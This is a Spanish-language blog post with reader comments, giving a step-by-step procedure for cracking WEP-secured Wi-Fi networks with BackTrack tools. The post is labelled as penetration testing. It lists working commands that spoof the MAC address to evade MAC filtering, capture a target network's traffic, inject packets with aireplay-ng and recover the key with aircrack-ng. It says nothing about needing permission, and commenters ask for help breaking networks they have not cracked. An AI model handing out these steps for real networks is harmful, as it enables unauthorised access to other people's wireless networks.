Pentesting en redes de tipo WEP
Sigo tratando de sacar tiempo para colocar información interesante;
El dia de hoy les traigo los pasos necesarios para hacer pruebas de penetración en una red con seguridad del tipo WEP - Wireless Equivalent Privacy.
Para este efecto, usaremos la version de Linux BackTrack 5R2;
La primera parte es para encubrir nuestra dirección MAC, o si no encubrirla, ofuscarla tratando de mimetizarla como otro tipo de dispositivo o marca de dispositivo; muchas veces los routers tienen activada la función de Filtrado de MAC; tratando de evitar que un dispositivo que no se encuentre dentro de la lista de MAC autorizadas se conecte a la red; para este efecto, es decir cambiar nuestra MAC utilizamos la herramienta macchanger; supremamente útil para estos casos.
En una consola o terminal ejecutamos:
# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger --mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
Hasta aqui hemos cambiado la MAC de la tarjeta inalámbrica; ahora procedemos a buscar las redes:
# airodump-ng wlan0
Apretamos para detener push ctrl+c
Copiamos el BSSID de la red que queramos probar
# airodump-ng -c (numero del canal) -w wep123 --bssid (bssid) wlan0
mientras pwr sea más grande, mejor
el #Data debe ser alrededor de 20.000, para forzarlo:
#aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
#aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
Ahora esperamos a que nuestro #Data sobrepase los 20.000 y al hacerlo ejecutamos:
# aircrack-ng -n 64 -b (bssid) wep123-01.cap
Y listo; si tenenmos suficiente Data, lo mas seguro es que podamos recuperar la clave de la red.
Espero que les vaya muy bien en sus pruebas.
Buenas tardes amigo, mi pregunta es que antena inalambrica nos recomiendas para hacer estas pruebas, ya que no quiero que se dañe la de mi PC.
ResponderEliminarMuchas Gracias
Es una muy buena pregunta Brian; mi recomendación es que visites el siguiente enlace de BackTrack: http://www.backtrack-linux.org/wiki/index.php/Wireless_Drivers alli encontrarás la lista de Chipsets que son compatibles con el lnux backtrack; personalmente utilizo las tarjetas ALFA, que son identificadas como RALINK.
ResponderEliminargracias amigo, consegui la antena y me a funcionado de maravilla.
ResponderEliminarAhora tengo otra pregunta, ahi redes WEP que no logro romper su contraseña, teniendo en cuenta que el #data que he llegado a recolectar es superior a 200.000
que puedo hacer en esos casos? ya que nos recomendaste un #data superior a 20.000